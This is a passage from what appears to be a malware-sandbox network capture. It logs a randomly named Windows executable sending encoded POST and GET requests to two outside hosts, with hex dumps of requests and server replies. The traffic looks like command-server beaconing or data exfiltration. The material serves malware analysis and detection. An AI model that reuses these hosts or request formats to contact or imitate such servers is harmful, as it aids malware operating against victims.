                                                                                                  Content-Length: 234
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: no-cache
                                                                                                  Referer: http://www.techforcreators.live/6rby/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                  Data Raw: 54 42 31 6c 45 3d 37 67 48 32 32 43 70 43 4b 6b 30 47 4c 71 46 31 57 57 68 39 4e 75 57 63 32 2f 49 46 57 72 49 71 55 59 77 35 34 36 51 53 67 58 6b 30 62 72 73 64 2f 63 50 67 2b 55 6d 56 4d 7a 59 66 7a 76 35 75 49 4e 64 32 58 64 6b 2f 4e 34 4f 6c 6c 67 46 46 48 54 52 4e 79 34 54 75 62 36 6b 41 51 55 65 48 4a 4a 6a 55 43 65 66 55 5a 32 64 47 38 2f 78 59 75 71 6e 63 77 39 4e 31 68 57 69 6c 78 73 44 77 75 39 63 56 55 58 4a 4e 73 70 79 36 65 6f 4f 69 41 70 4d 6e 4d 6a 2f 35 44 64 62 67 58 66 48 61 64 69 38 4d 64 4c 45 66 4a 6b 6a 72 46 62 72 2b 52 4f 4b 4a 41 79 65 6e 2b 68 46 34 70 38 76 4b 2b 74 38 32 50 33 6b 76 42 53 47 39 76 4f 6f 56 68 58 48 6a 5a 64 4c 76 48 59 6a 35 78 49 4f 78 67 51 3d 3d
                                                                                                  Data Ascii: TB1lE=7gH22CpCKk0GLqF1WWh9NuWc2/IFWrIqUYw546QSgXk0brsd/cPg+UmVMzYfzv5uINd2Xdk/N4OllgFFHTRNy4Tub6kAQUeHJJjUCefUZ2dG8/xYuqncw9N1hWilxsDwu9cVUXJNspy6eoOiApMnMj/5DdbgXfHadi8MdLEfJkjrFbr+ROKJAyen+hF4p8vK+t82P3kvBSG9vOoVhXHjZdLvHYj5xIOxgQ==
                                                                                                  Dec 30, 2024 10:58:45.893651962 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                  content-length: 0
                                                                                                  connection: close


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.64999052.223.13.41804608C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 30, 2024 10:58:48.012761116 CET1819OUTPOST /6rby/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Host: www.techforcreators.live
                                                                                                  Origin: http://www.techforcreators.live
                                                                                                  Content-Length: 1246
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: no-cache
                                                                                                  Referer: http://www.techforcreators.live/6rby/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                  Data Raw: 54 42 31 6c 45 3d 37 67 48 32 32 43 70 43 4b 6b 30 47 4c 71 46 31 57 57 68 39 4e 75 57 63 32 2f 49 46 57 72 49 71 55 59 77 35 34 36 51 53 67 58 63 30 48 4e 77 64 2f 37 62 67 2f 55 6d 56 42 54 59 43 7a 76 35 4a 49 4f 74 79 58 64 34 77 4e 36 6d 6c 6b 47 4a 46 42 69 52 4e 37 34 54 75 55 61 6b 46 55 55 65 53 4a 4b 61 64 43 65 50 55 5a 32 64 47 38 39 5a 59 75 2f 62 63 39 64 4e 79 77 57 69 70 6e 73 44 59 75 35 49 72 55 58 64 43 73 59 53 36 65 4a 69 69 43 66 59 6e 54 54 2b 66 50 39 61 7a 58 66 4b 43 64 69 68 31 64 4b 77 35 4a 6a 6a 72 56 50 47 78 46 66 4b 78 64 7a 4b 77 72 41 70 30 6c 4a 6a 6a 37 50 6b 46 4b 6b 6b 6e 45 69 43 6d 6f 37 45 36 73 32 2b 37 63 2b 6e 37 43 38 61 61 34 62 76 31 37 33 7a 4d 6c 71 34 69 49 52 6d 69 68 6b 45 55 76 4b 4a 69 33 38 6c 2f 36 39 2b 67 69 77 51 56 75 6d 57 72 54 57 69 72 6d 5a 48 63 51 6a 73 49 4a 6c 70 4d 4f 5a 59 4d 69 44 59 73 30 31 46 70 6a 6e 77 43 70 75 6d 43 72 41 54 35 71 52 4c 6d 79 56 69 61 76 4f 39 34 69 44 78 68 69 46 36 6b 62 67 77 48 63 47 75 42 2b 73 49 5a [TRUNCATED]
                                                                                                  Data Ascii: TB1lE=7gH22CpCKk0GLqF1WWh9NuWc2/IFWrIqUYw546QSgXc0HNwd/7bg/UmVBTYCzv5JIOtyXd4wN6mlkGJFBiRN74TuUakFUUeSJKadCePUZ2dG89ZYu/bc9dNywWipnsDYu5IrUXdCsYS6eJiiCfYnTT+fP9azXfKCdih1dKw5JjjrVPGxFfKxdzKwrAp0lJjj7PkFKkknEiCmo7E6s2+7c+n7C8aa4bv173zMlq4iIRmihkEUvKJi38l/69+giwQVumWrTWirmZHcQjsIJlpMOZYMiDYs01FpjnwCpumCrAT5qRLmyViavO94iDxhiF6kbgwHcGuB+sIZfZueYygoejK8tLoToZY5aH0gbNkqL2az5RsEpQp2iLPVHd0IEMSDfR7apSbBru/LBrXnjYKwGHb50L2Uk7rlDcbeekPCO/FP0oV+YQdq7EoDqTkWxS6ZieLjtlGOMU8oxv9IBu+NaCLtiEf5Mu6uNcAJB3eUv7HztVyzo8VkGRFp3dc+3qHfySxI4UDNGp3gLCJYdp/VtwqpZ8CiXWV8TSCfvoE27C1MUj290npxC2W8LMWD86LVPYQXpt/NXcuUKpJG4lL/+PQVjYq5e/th+7Cf3x+7uMcjTqESTaxfVZdxAImgKTYYKVd7jZX2XDj6t7CP4aAEAd2HT4FSjpXjp2/+qZy3SaKpxW85wOXBWpNJHSp3k3LUyFsMsJ6ITKxzNAChNvMSPgTWPZPfJONfeKVGaxAkZ9S3/o3y5jJtY0CrjvIQT11wMeezIuEcdYwVIq8SyPMaLrrexuTYd9H9KvrSXcj2eD0+7JjO/WCGAygy5rJSNmNm8ItHRNxq9Gvzk4dyLaisEf8j/vM+5jJ8Jcv6+Day86wfGhFhCSorvOyWSDyXeVZY5MreSRzDmo6pOcnAAaKxyDl53U5LfntZzwKEaitBTMeNJBoFf9jIGokKz3Lbdf5JWrizZOlmPv8FdzqQoQaK5Zu0IEu0TXmF9lfNL4/ncqRI8c [TRUNCATED]
                                                                                                  Dec 30, 2024 10:58:48.451124907 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                  content-length: 0
                                                                                                  connection: close


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.64999152.223.13.41804608C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 30, 2024 10:58:50.554193974 CET516OUTGET /6rby/?TB1lE=2ivW13goMDZZIIgxIXx+PtmXwvlQP7M8TrIp9IEQgHwuZNQL7M/h+QGYEWAJ9fx4B+FPevpSLI/kijRzPjJx+Yn6WZwPBUitPI+kHM7nbQtU8vpWrajM5+kH6naS6tDsldE5bxs=&yt=LNd8mbFxBhGLQV HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.techforcreators.live
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                  Dec 30, 2024 10:58:50.985822916 CET396INHTTP/1.1 200 OK
                                                                                                  content-type: text/html
                                                                                                  date: Mon, 30 Dec 2024 09:58:50 GMT
                                                                                                  content-length: 275
                                                                                                  connection: close
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 54 42 31 6c 45 3d 32 69 76 57 31 33 67 6f 4d 44 5a 5a 49 49 67 78 49 58 78 2b 50 74 6d 58 77 76 6c 51 50 37 4d 38 54 72 49 70 39 49 45 51 67 48 77 75 5a 4e 51 4c 37 4d 2f 68 2b 51 47 59 45 57 41 4a 39 66 78 34 42 2b 46 50 65 76 70 53 4c 49 2f 6b 69 6a 52 7a 50 6a 4a 78 2b 59 6e 36 57 5a 77 50 42 55 69 74 50 49 2b 6b 48 4d 37 6e 62 51 74 55 38 76 70 57 72 61 6a 4d 35 2b 6b 48 36 6e 61 53 36 74 44 73 6c 64 45 35 62 78 73 3d 26 79 74 3d 4c 4e 64 38 6d 62 46 78 42 68 47 4c 51 56 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?TB1lE=2ivW13goMDZZIIgxIXx+PtmXwvlQP7M8TrIp9IEQgHwuZNQL7M/h+QGYEWAJ9fx4B+FPevpSLI/kijRzPjJx+Yn6WZwPBUitPI+kHM7nbQtU8vpWrajM5+kH6naS6tDsldE5bxs=&yt=LNd8mbFxBhGLQV"}</script></head></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.649993108.179.193.23804608C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 30, 2024 10:58:56.347444057 CET755OUTPOST /htux/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Host: www.missvet.net
                                                                                                  Origin: http://www.missvet.net
                                                                                                  Content-Length: 210
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: no-cache
                                                                                                  Referer: http://www.missvet.net/htux/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                  Data Raw: 54 42 31 6c 45 3d 64 37 75 77 69 42 68 76 37 39 76 73 65 38 34 44 7a 39 64 6d 4a 39 51 6f 65 77 38 50 49 39 45 69 46 37 43 4e 30 75 39 36 33 43 74 69 49 59 6d 4c 46 36 69 38 6a 6e 41 63 55 33 73 58 68 46 43 31 4a 52 47 76 55 31 6b 54 71 33 4b 38 50 62 75 6d 71 4a 67 67 48 77 59 58 58 47 6f 58 6a 52 30 77 76 32 6d 46 68 45 47 63 42 76 49 74 4a 53 6b 35 5a 67 79 56 48 2f 4e 6b 42 59 77 76 76 6e 4d 6c 66 63 39 49 49 53 70 6a 39 4f 63 79 79 43 6a 5a 59 78 37 44 4b 50 56 71 33 73 5a 51 35 78 2f 78 45 50 70 6a 61 30 79 4a 2f 43 4a 72 54 79 63 6a 50 70 43 75 39 2b 62 72 33 61 59 63 43 61 32 58 30 71 44 51 4d 4e 6e 41 62 62 31 43
                                                                                                  Data Ascii: TB1lE=d7uwiBhv79vse84Dz9dmJ9Qoew8PI9EiF7CN0u963CtiIYmLF6i8jnAcU3sXhFC1JRGvU1kTq3K8PbumqJggHwYXXGoXjR0wv2mFhEGcBvItJSk5ZgyVH/NkBYwvvnMlfc9IISpj9OcyyCjZYx7DKPVq3sZQ5x/xEPpja0yJ/CJrTycjPpCu9+br3aYcCa2X0qDQMNnAbb1C
                                                                                                  Dec 30, 2024 10:58:57.038362026 CET1236INHTTP/1.1 404 Not Found
                                                                                                  Date: Mon, 30 Dec 2024 09:58:56 GMT
                                                                                                  Server: Apache
                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  Link: <https://missvet.net/wp-json/>; rel="https://api.w.org/"
                                                                                                  Vary: Accept-Encoding
                                                                                                  Upgrade: h2,h2c
                                                                                                  Connection: Upgrade
                                                                                                  Content-Encoding: gzip
                                                                                                  X-Endurance-Cache-Level: 0
                                                                                                  X-nginx-cache: WordPress
                                                                                                  Content-Length: 5814
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 52 db 72 db c6 96 7d b6 be a2 85 54 2c 30 c6 8d e0 45 12 25 ca 93 38 ce 54 4e 25 c7 29 db 39 e7 c1 f6 78 9a c0 26 d0 16 d0 8d 74 37 44 d2 8a 3e e6 d4 f9 8b 79 cd 8f cd 6e 80 17 88 02 25 d9 d2 54 8d 4a 82 80 dd 7b af b5 7a ed 75 ba 1f 8b 48 2f 0a 20 a9 ce b3 b3 bd 53 f3 8f 64 94 27 63 ab d0 ee 0f af 2d 53 03 1a 9f ed 3d 39 cd 41 53 12 a5 54 2a d0 63 eb f7 b7 3f b9 47 d6 ba ce 69 0e 63 eb 82 c1 ac 10 52 5b 24 12 5c 03 c7 be 19 8b 75 3a 8e e1 82 45 e0 56 1f 0e 61 9c 69 46 33 57 45 34 83 71 b7 42 c9 18 3f 27 12 32 24 96 62 ca 32 b0 48 2a 61 3a b6 52 ad 0b 35 f2 fd 24 2f 12 4f c8 c4 9f 4f b9 df ad 87 34 d3 19 9c fd f6 d7 bf 12 c6 51 c3 5f ff 16 04 b8 a1 96 34 a6 e4 e9 37 47 61 b7 7b 42 7e 65 8a fc 03 f4 a9 5f b7 ef 35 14 1f 48 31 11 5a 1d ac f5 1e e4 74 ee b2 9c 26 e0 16 12 cc 7d 46 19 95 09 1c 10 df 10 2a bd 40 04 96 27 23 a6 ec 77 8a 7d 06 35 b6 68 a9 85 45 d8 07 87 d4 95 ff aa 4b 8e a9 75 c8 65 85 4d 19 77 19 ea 62 5c b1 c8 35 6d 23 d2 0b 82 a0 98 93 ee a0 fa 77 75 ea [TRUNCATED]
                                                                                                  Data Ascii: Rr}T,0E%8TN%)9x&t7D>yn%TJ{zuH/ Sd'c-S=9AST*c?GicR[$\u:EVaiF3WE4qB?'2$b2H*a:R5$/OO4Q_47Ga{B~e_5H1Zt&}F*@'#w}5hEKueMwb\5m#wuM3b)(=9)u+ahAr?X,E"T<81~IA%]yDJG)NoS_L/fZ5HB8+ D1&T2FK{_y3~y%~w^X08<u|Vheo[2ktiarjl_7lxVB5b/{wu=}6E,Md8HdwYG9pL/UYBYo4/F6;Jx5;W'B7ZHSW46]B]]94"|
                                                                                                  Dec 30, 2024 10:58:57.038372993 CET224INData Raw: 91 b6 03 27 70 f0 9b f2 0b 8a 6b 60 b1 4e 37 9f 29 b0 24 d5 1d 2c e0 ad b3 b7 b8 46 5b 63 7b d0 39 a9 2f 60 54 fe ce b8 ee 85 df 4b 49 17 36 78 09 6a 32 3b 44 ed f4 3e d0 5e 8c 8d 1d 47 8e ed 07 68 e2 95 26 e7 b1 d4 74 4e 24 e8 52 72 a2 3d c0 10
                                                                                                  Data Ascii: 'pk`N7)$,F[c{9/`TKI6xj2;D>^Gh&tN$Rr=,^|?\u6+;DY&h9h`e|9S0b|a]vMuwGa)myt[Y~hxx;no4oUjO
                                                                                                  Dec 30, 2024 10:58:57.038383007 CET1236INData Raw: 6c b5 83 c6 4d 63 d3 16 0e d7 ee 4f ba 13 ab e5 68 b2 3c ea 5c 2d 11 ba 9b ad 4f 57 5b bf a0 92 c8 b1 55 f2 18 a6 8c 43 6c ed 8f f5 a2 00 31 25 ff 14 f2 1c e4 7f 66 62 42 b3 37 91 28 e0 e9 53 05 d9 94 30 ae 34 e5 51 6b cb 73 93 e7 57 d3 a9 8a 24
                                                                                                  Data Ascii: lMcOh<\-OW[UCl1%fbB7(S04QksW$QL5 mNqX\r.g,^Gb\u1g~@2=(,zS[ %]uN9l/)|K>M@G'mGz|C=^=%1 {(/R
                                                                                                  Dec 30, 2024 10:58:57.038423061 CET1236INData Raw: de 21 55 a9 eb f5 7a bd 75 ed 64 2a b8 76 15 fb 0c a3 ae d7 0d 07 90 5f 6d 54 9b 9b 7d fc 58 6b bf 6c ec 7c 25 b2 71 91 36 29 cd 75 6f 9c 4d 32 31 c1 78 b5 59 3a 92 42 e8 4b d7 45 01 6e 21 41 81 76 5d aa 0a 88 b4 5b c1 ba ae fa a3 a4 12 30 d6 27
                                                                                                  Data Ascii: !Uzud*v_mT}Xkl|%q6)uoM21xY:BKEn!Av][0'uM=?"=GSh[BCA{v#rw[m..0"O{OKR7tt29.g)hYdkOA3p;<a{`+!hB}Y3.J0<uO@h{%Fx
                                                                                                  Dec 30, 2024 10:58:57.038433075 CET448INData Raw: 98 4f 6b 94 9d 7b 95 10 3f 88 61 8d d2 c2 90 95 39 e3 a2 5c 51 09 49 79 f2 30 b7 5a 11 ef 66 a6 f9 04 e4 63 12 57 80 6d bc 2c 49 35 86 05 80 2f e3 f3 10 ce 2d b0 9d 3b 7c 24 be 6d b0 5d a9 ac 89 b2 f2 61 ab bc 0e b5 f3 6e 8f 43 b6 85 b5 93 ad 28
                                                                                                  Data Ascii: Ok{?a9\QIy0ZfcWm,I5/-;|$m]anC(e=U3c"[JqytU -<i*jrWmJy=9\QIyu"H?aTc2_sGUnU!va$[;YRC(j{B1)J
                                                                                                  Dec 30, 2024 10:58:57.038443089 CET1236INData Raw: c1 b6 ec 50 99 c0 57 00 56 73 2d 78 f3 af 46 9c b7 61 ee 8d 66 29 48 b0 3d 1c 9a 64 22 3a 77 0b a1 b4 ab 21 2f 32 aa c1 63 e6 06 0b 51 6a 77 9a c1 bc 73 99 d0 62 44 ba 5e 38 80 fc e4 ea de b3 89 64 f1 d6 ec 4d e2 48 64 65 ce 55 3b 65 d8 ca 77 73
                                                                                                  Data Ascii: PWVs-xFaf)H=d":w!/2cQjwsbD^8dMHdeU;ews4RMn*-Rh4zF[8)QN}9Ja ,.dcjt#H*aGZ#R=G%cSQ|{u1YLHRV]WW^4<kh8i|
                                                                                                  Dec 30, 2024 10:58:57.038454056 CET701INData Raw: 39 c5 35 31 31 a0 cd ac 30 91 b9 26 a9 81 74 ea 17 2b 9d 35 d2 b5 8f 7a fd 20 4d 16 29 e3 95 e1 ab f5 5c 63 32 a7 56 3d dc b4 a4 c0 88 ae 96 53 d1 9c a6 dd 75 8a b8 96 8b 95 9f df 93 62 69 00 ff eb df 82 14 22 46 13 71 5d c0 0d 9d a4 31 f5 50 4b
                                                                                                  Data Ascii: 95110&t+5z M)\c2V=Subi"Fq]1PKZ{71moTBG2l(d"W7KOYlYsSPU,Iv=^&a=nx-nPc&i|+@+yuK.QK$zQ@\5GiLu_MZ:


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  6192.168.2.649994108.179.193.23804608C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 30, 2024 10:58:58.887347937 CET779OUTPOST /htux/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Host: www.missvet.net
                                                                                                  Origin: http://www.missvet.net
                                                                                                  Content-Length: 234
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: no-cache
                                                                                                  Referer: http://www.missvet.net/htux/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                  Data Raw: 54 42 31 6c 45 3d 64 37 75 77 69 42 68 76 37 39 76 73 63 63 49 44 78 66 31 6d 49 64 51 72 52 51 38 50 54 74 45 6d 46 37 4f 4e 30 73 51 6c 32 77 4a 69 49 35 57 4c 45 34 61 38 75 48 41 63 61 58 74 64 76 6c 43 2b 4a 52 4b 34 55 30 59 54 71 33 65 38 50 61 65 6d 71 36 49 6a 46 67 59 5a 59 6d 6f 56 2b 42 30 77 76 32 6d 46 68 45 69 32 42 76 51 74 4a 67 77 35 62 46 53 57 4b 66 4e 72 47 59 77 76 34 33 4e 73 66 63 38 64 49 58 4a 4a 39 49 59 79 79 47 6e 5a 5a 67 37 4d 41 50 55 68 35 4d 59 58 30 54 61 54 46 2f 38 68 57 55 36 6f 73 52 78 54 62 6b 42 35 54 61 43 4e 76 75 37 70 33 59 41 75 43 36 32 39 32 71 37 51 65 61 72 6e 55 76 51 68 33 38 6c 32 36 62 31 68 30 68 49 72 42 6c 2b 47 49 4d 47 4e 65 41 3d 3d
                                                                                                  Data Ascii: TB1lE=d7uwiBhv79vsccIDxf1mIdQrRQ8PTtEmF7ON0sQl2wJiI5WLE4a8uHAcaXtdvlC+JRK4U0YTq3e8Paemq6IjFgYZYmoV+B0wv2mFhEi2BvQtJgw5bFSWKfNrGYwv43Nsfc8dIXJJ9IYyyGnZZg7MAPUh5MYX0TaTF/8hWU6osRxTbkB5TaCNvu7p3YAuC6292q7QearnUvQh38l26b1h0hIrBl+GIMGNeA==
                                                                                                  Dec 30, 2024 10:58:59.564294100 CET1236INHTTP/1.1 404 Not Found
                                                                                                  Date: Mon, 30 Dec 2024 09:58:59 GMT
                                                                                                  Server: Apache
                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  Link: <https://missvet.net/wp-json/>; rel="https://api.w.org/"
                                                                                                  Vary: Accept-Encoding
                                                                                                  Upgrade: h2,h2c
                                                                                                  Connection: Upgrade
                                                                                                  Content-Encoding: gzip
                                                                                                  X-Endurance-Cache-Level: 0
                                                                                                  X-nginx-cache: WordPress
                                                                                                  Content-Length: 5814
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 52 db 72 db c6 96 7d b6 be a2 85 54 2c 30 c6 8d e0 45 12 25 ca 93 38 ce 54 4e 25 c7 29 db 39 e7 c1 f6 78 9a c0 26 d0 16 d0 8d 74 37 44 d2 8a 3e e6 d4 f9 8b 79 cd 8f cd 6e 80 17 88 02 25 d9 d2 54 8d 4a 82 80 dd 7b af b5 7a ed 75 ba 1f 8b 48 2f 0a 20 a9 ce b3 b3 bd 53 f3 8f 64 94 27 63 ab d0 ee 0f af 2d 53 03 1a 9f ed 3d 39 cd 41 53 12 a5 54 2a d0 63 eb f7 b7 3f b9 47 d6 ba ce 69 0e 63 eb 82 c1 ac 10 52 5b 24 12 5c 03 c7 be 19 8b 75 3a 8e e1 82 45 e0 56 1f 0e 61 9c 69 46 33 57 45 34 83 71 b7 42 c9 18 3f 27 12 32 24 96 62 ca 32 b0 48 2a 61 3a b6 52 ad 0b 35 f2 fd 24 2f 12 4f c8 c4 9f 4f b9 df ad 87 34 d3 19 9c fd f6 d7 bf 12 c6 51 c3 5f ff 16 04 b8 a1 96 34 a6 e4 e9 37 47 61 b7 7b 42 7e 65 8a fc 03 f4 a9 5f b7 ef 35 14 1f 48 31 11 5a 1d ac f5 1e e4 74 ee b2 9c 26 e0 16 12 cc 7d 46 19 95 09 1c 10 df 10 2a bd 40 04 96 27 23 a6 ec 77 8a 7d 06 35 b6 68 a9 85 45 d8 07 87 d4 95 ff aa 4b 8e a9 75 c8 65 85 4d 19 77 19 ea 62 5c b1 c8 35 6d 23 d2 0b 82 a0 98 93 ee a0 fa 77 75 ea [TRUNCATED]
                                                                                                  Data Ascii: Rr}T,0E%8TN%)9x&t7D>yn%TJ{zuH/ Sd'c-S=9AST*c?GicR[$\u:EVaiF3WE4qB?'2$b2H*a:R5$/OO4Q_47Ga{B~e_5H1Zt&}F*@'#w}5hEKueMwb\5m#wuM3b)(=9)u+ahAr?X,E"T<81~IA%]yDJG)NoS_L/fZ5HB8+ D1&T2FK{_y3~y%~w^X08<u|Vheo[2ktiarjl_7lxVB5b/{wu=}6E,Md8HdwYG9pL/UYBYo4/F6;Jx5;W'B7ZHSW46]B]]94"|
                                                                                                  Dec 30, 2024 10:58:59.564302921 CET1236INData Raw: 91 b6 03 27 70 f0 9b f2 0b 8a 6b 60 b1 4e 37 9f 29 b0 24 d5 1d 2c e0 ad b3 b7 b8 46 5b 63 7b d0 39 a9 2f 60 54 fe ce b8 ee 85 df 4b 49 17 36 78 09 6a 32 3b 44 ed f4 3e d0 5e 8c 8d 1d 47 8e ed 07 68 e2 95 26 e7 b1 d4 74 4e 24 e8 52 72 a2 3d c0 10
                                                                                                  Data Ascii: 'pk`N7)$,F[c{9/`TKI6xj2;D>^Gh&tN$Rr=,^|?\u6+;DY&h9h`e|9S0b|a]vMuwGa)myt[Y~hxx;no4oUjOlMcOh<
                                                                                                  Dec 30, 2024 10:58:59.564316034 CET1236INData Raw: dd c4 30 7b 4b a4 28 79 dc aa aa a0 71 8c 4e 1a 8e 6b 07 57 c6 58 63 1e fa 8a 36 9c 13 09 d9 f8 a0 b6 33 05 d0 07 2b 9f 27 99 88 ce dd 8c 4d 24 95 8b ca 61 92 4a 98 8e 0f 52 ad 8b 91 ef e7 4c a9 0b d0 1e 07 ed 63 3b e3 51 56 c6 a0 7c ec f4 d1 6a
                                                                                                  Data Ascii: 0{K(yqNkWXc63+'M$aJRLc;QV|j_9qCbF_[vQXbsh>y2E(BK-8HjLU&hn}L7dca/:#JR4`\?0n@F&x]\;lo84+~Fb!Uzud*v
                                                                                                  Dec 30, 2024 10:58:59.564321041 CET1236INData Raw: a4 10 4a bb 78 7f d4 ac a1 9d ab eb 85 83 2f 9a 6d 90 ae 66 bd 94 2a 9c a2 b5 48 21 2f ab e7 88 5c 50 69 5f cf 52 75 e0 d6 bd 1d b2 cf f2 42 48 4d b9 5e 62 44 0b ca f1 b0 64 2a 45 1e ba b8 27 dc f6 58 0b f2 2c c5 1c dc 13 ae ea 6d c1 28 68 06 6e
                                                                                                  Data Ascii: Jx/mf*H!/\Pi_RuBHM^bDd*E'X,m(hn}oo`,v%Z`a,THunO@~E5'Ny{lW"VvRE)@IFswD]BhA^W@"kLH*])Ok{?a9
                                                                                                  Dec 30, 2024 10:58:59.564333916 CET1236INData Raw: 2d 0a 5c 20 1a 8c 9d 52 c5 cf e6 79 86 47 4c 67 78 f6 fa cd 8f b7 11 60 ab 2c 22 af 48 8b e7 38 69 68 f6 f6 4e 73 d0 94 70 9a e3 78 02 1c f0 42 42 e2 d6 70 93 c0 35 b2 67 90 e3 8b 90 a4 e7 85 03 6f 78 42 a6 40 75 29 41 8d 08 7c 34 0b ff c8 b0 f9
                                                                                                  Data Ascii: -\ RyGLgx`,"H8ihNspxBBp5goxB@u)A|4HBch1*z^p_3LBM1Q'Dx<RQl*b$8$"j.p: vHjn:{'`d8>*suk,~g8F"jyL0LhtH
                                                                                                  Dec 30, 2024 10:58:59.564338923 CET137INData Raw: 4a 5d 80 f6 38 68 7f 56 b8 51 7d 2d 5f a7 78 11 e5 a7 90 65 c2 dd dc 0a d3 04 5a f9 9f 56 27 53 59 f5 c7 5e ce b8 f7 49 3d 47 05 e3 9e d7 f5 ba 16 61 31 72 54 4d 15 d6 ba d5 fd a4 ac b3 8d ac 2f d0 54 64 25 46 08 a9 69 51 2c 36 a2 5c f4 07 d7 d4
                                                                                                  Data Ascii: J]8hVQ}-_xeZV'SY^I=Ga1rTM/Td%FiQ,6\sWLpWOBDR-mbK?&eL


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  7192.168.2.649995108.179.193.23804608C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 30, 2024 10:59:01.435453892 CET1792OUTPOST /htux/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Host: www.missvet.net
                                                                                                  Origin: http://www.missvet.net
                                                                                                  Content-Length: 1246
                                                                                                  Connection: close
